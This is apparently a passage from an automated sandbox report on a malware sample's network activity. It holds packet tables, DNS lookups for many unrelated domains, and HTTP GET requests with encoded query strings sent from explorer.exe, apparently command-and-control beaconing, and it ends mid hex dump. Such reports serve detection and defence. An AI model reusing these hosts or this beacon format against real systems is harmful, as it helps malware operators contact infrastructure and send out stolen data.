                                                                  Apr 12, 2021 10:04:17.253741980 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.253856897 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.254053116 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.381551027 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.381587029 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.381611109 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:17.381784916 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.381843090 CEST4973480192.168.2.752.206.71.220
                                                                  Apr 12, 2021 10:04:17.508168936 CEST804973452.206.71.220192.168.2.7
                                                                  Apr 12, 2021 10:04:22.617058992 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:22.809813976 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:22.809901953 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:22.810084105 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:23.060673952 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:23.319248915 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:23.560704947 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:28.448050022 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.499239922 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.499409914 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.499571085 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.550677061 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859160900 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859213114 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859246016 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859287024 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859333038 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859376907 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859422922 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859467983 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859505892 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859538078 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859651089 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859695911 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859843016 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859869957 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859878063 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.910902023 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.911047935 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:50.369215012 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.409693956 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.409964085 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.410053968 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.450339079 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.450371027 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.450383902 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.450684071 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.450711966 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.491023064 CEST8049741192.0.78.25192.168.2.7

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 12, 2021 10:02:20.495014906 CEST6245253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:20.560719013 CEST53624528.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:20.586713076 CEST5782053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:20.635438919 CEST53578208.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:30.757080078 CEST5084853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:30.821048021 CEST53508488.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:42.614327908 CEST6124253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:42.679126024 CEST53612428.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:47.830168009 CEST5856253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:47.887202978 CEST53585628.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:02:50.157366991 CEST5659053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:02:50.225857973 CEST53565908.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:06.816339016 CEST6050153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:06.865113974 CEST53605018.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:07.356026888 CEST5377553192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:07.405900955 CEST53537758.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:08.604291916 CEST5183753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:08.659311056 CEST53518378.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:11.278681040 CEST5541153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:11.337115049 CEST53554118.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:15.726967096 CEST6366853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:15.775674105 CEST53636688.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:21.432589054 CEST5464053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:21.494884014 CEST53546408.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:22.569964886 CEST5873953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:22.632436037 CEST53587398.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:22.870313883 CEST6033853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:23.026472092 CEST53603388.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:24.307562113 CEST5871753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:24.359051943 CEST53587178.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:33.147968054 CEST5976253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:33.315085888 CEST53597628.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:38.910700083 CEST5432953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:39.600145102 CEST53543298.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:43.517762899 CEST5805253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:43.567584038 CEST53580528.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:44.616936922 CEST5400853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:44.994215012 CEST53540088.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:49.180460930 CEST5945153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:49.229583025 CEST53594518.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:50.432384014 CEST5291453192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:50.498863935 CEST53529148.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:50.618171930 CEST6456953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:50.706372976 CEST53645698.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:03:55.866353035 CEST5281653192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:03:55.940130949 CEST53528168.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:01.071098089 CEST5078153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:01.145728111 CEST53507818.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:06.259737015 CEST5423053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:06.437951088 CEST53542308.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:10.239384890 CEST5491153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:10.315071106 CEST53549118.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:10.905457020 CEST4995853192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:10.985584974 CEST53499588.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:11.602550983 CEST5086053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:11.610517979 CEST5045253192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:11.659197092 CEST53504528.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:11.664302111 CEST53508608.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:11.758018017 CEST5973053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:12.050801039 CEST53597308.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:12.100214958 CEST5931053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:12.157545090 CEST53593108.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:12.731231928 CEST5191953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:12.841996908 CEST53519198.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:13.643189907 CEST6429653192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:13.700999975 CEST53642968.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:14.505546093 CEST5668053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:14.567795038 CEST53566808.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:15.561683893 CEST5882053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:15.628526926 CEST53588208.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:16.149455070 CEST6098353192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:16.202244997 CEST53609838.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:16.502510071 CEST4924753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:16.564606905 CEST53492478.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:17.016347885 CEST5228653192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:17.059242010 CEST5606453192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:17.078577042 CEST53522868.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:17.126185894 CEST53560648.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:22.400674105 CEST6374453192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:22.615638018 CEST53637448.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:28.382811069 CEST6145753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:28.445403099 CEST53614578.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:33.483331919 CEST5836753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:33.531981945 CEST53583678.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:33.868014097 CEST6059953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:33.948719978 CEST53605998.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:39.572663069 CEST5957153192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:39.647254944 CEST53595718.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:45.185347080 CEST5268953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:45.270700932 CEST53526898.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:04:52.523541927 CEST5029053192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:04:52.573712111 CEST53502908.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:05:00.748820066 CEST6042753192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:05:00.800390005 CEST53604278.8.8.8192.168.2.7
                                                                  Apr 12, 2021 10:05:06.053375006 CEST5620953192.168.2.78.8.8.8
                                                                  Apr 12, 2021 10:05:06.754046917 CEST53562098.8.8.8192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Apr 12, 2021 10:03:22.870313883 CEST192.168.2.78.8.8.80x24efStandard query (0)www.emmajanetracy.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:33.147968054 CEST192.168.2.78.8.8.80x2947Standard query (0)www.omxpro.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:38.910700083 CEST192.168.2.78.8.8.80xfd95Standard query (0)www.rosewoodcibubur.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:44.616936922 CEST192.168.2.78.8.8.80x7eb2Standard query (0)www.okitmall.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:50.618171930 CEST192.168.2.78.8.8.80x3d59Standard query (0)www.moretuantired.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:55.866353035 CEST192.168.2.78.8.8.80x12acStandard query (0)www.betbonusuk.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:01.071098089 CEST192.168.2.78.8.8.80x566eStandard query (0)www.weluvweb.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.259737015 CEST192.168.2.78.8.8.80xb55eStandard query (0)www.warungjitu.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:11.758018017 CEST192.168.2.78.8.8.80xe2a2Standard query (0)www.peridot.websiteA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.059242010 CEST192.168.2.78.8.8.80x1742Standard query (0)www.appearwood.clubA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:22.400674105 CEST192.168.2.78.8.8.80x66c6Standard query (0)www.theartsutra.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:28.382811069 CEST192.168.2.78.8.8.80xfaf3Standard query (0)www.chestfreezersale.xyzA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:33.868014097 CEST192.168.2.78.8.8.80xd76dStandard query (0)www.loktantratvnews.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:39.572663069 CEST192.168.2.78.8.8.80xe518Standard query (0)www.getboostphlo.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:45.185347080 CEST192.168.2.78.8.8.80x953fStandard query (0)www.ux300e.comA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:05:06.053375006 CEST192.168.2.78.8.8.80x3379Standard query (0)www.rosewoodcibubur.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Apr 12, 2021 10:03:23.026472092 CEST8.8.8.8192.168.2.70x24efNo error (0)www.emmajanetracy.comemmajanetracy.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:03:23.026472092 CEST8.8.8.8192.168.2.70x24efNo error (0)emmajanetracy.com192.0.78.25A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:23.026472092 CEST8.8.8.8192.168.2.70x24efNo error (0)emmajanetracy.com192.0.78.24A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:33.315085888 CEST8.8.8.8192.168.2.70x2947No error (0)www.omxpro.comwww.omxpro.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:03:39.600145102 CEST8.8.8.8192.168.2.70xfd95Server failure (2)www.rosewoodcibubur.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:44.994215012 CEST8.8.8.8192.168.2.70x7eb2No error (0)www.okitmall.com15.165.26.252A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:50.706372976 CEST8.8.8.8192.168.2.70x3d59No error (0)www.moretuantired.com81.17.18.198A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:55.940130949 CEST8.8.8.8192.168.2.70x12acNo error (0)www.betbonusuk.com104.21.7.67A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:03:55.940130949 CEST8.8.8.8192.168.2.70x12acNo error (0)www.betbonusuk.com172.67.187.138A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:01.145728111 CEST8.8.8.8192.168.2.70x566eNo error (0)www.weluvweb.com52.56.126.26A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)www.warungjitu.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:06.437951088 CEST8.8.8.8192.168.2.70xb55eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:12.050801039 CEST8.8.8.8192.168.2.70xe2a2Name error (3)www.peridot.websitenonenoneA (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)www.appearwood.clubhotlightexpens.funCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun52.206.71.220A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun34.196.151.230A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun52.86.219.129A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun54.144.3.29A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun54.237.125.12A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:22.615638018 CEST8.8.8.8192.168.2.70x66c6No error (0)www.theartsutra.com142.111.76.118A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:28.445403099 CEST8.8.8.8192.168.2.70xfaf3No error (0)www.chestfreezersale.xyz172.67.130.43A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:28.445403099 CEST8.8.8.8192.168.2.70xfaf3No error (0)www.chestfreezersale.xyz104.21.3.36A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:33.948719978 CEST8.8.8.8192.168.2.70xd76dNo error (0)www.loktantratvnews.comloktantratvnews.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:04:33.948719978 CEST8.8.8.8192.168.2.70xd76dNo error (0)loktantratvnews.com148.66.136.150A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:39.647254944 CEST8.8.8.8192.168.2.70xe518No error (0)www.getboostphlo.com172.67.219.254A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:39.647254944 CEST8.8.8.8192.168.2.70xe518No error (0)www.getboostphlo.com104.21.70.50A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:45.270700932 CEST8.8.8.8192.168.2.70x953fNo error (0)www.ux300e.com52.58.78.16A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:05:06.754046917 CEST8.8.8.8192.168.2.70x3379Server failure (2)www.rosewoodcibubur.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.emmajanetracy.com
                                                                  • www.okitmall.com
                                                                  • www.moretuantired.com
                                                                  • www.betbonusuk.com
                                                                  • www.weluvweb.com
                                                                  • www.warungjitu.com
                                                                  • www.appearwood.club
                                                                  • www.theartsutra.com
                                                                  • www.chestfreezersale.xyz

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.749705192.0.78.2580C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:23.076253891 CEST1368OUTGET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1
                                                                  Host: www.emmajanetracy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:23.117110968 CEST1372INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:03:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                                                  X-ac: 2.hhn _dfw
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.74971115.165.26.25280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:45.298271894 CEST1447OUTGET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1
                                                                  Host: www.okitmall.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:45.601017952 CEST1448INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 12 Apr 2021 08:03:45 GMT
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/5.6.36
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Cache-Control: No-Cache
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 9d b4 eb a6 84 ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 20 20 20 20 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 83 9d eb 85 84 ec 9b 94 ec 9d bc ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4
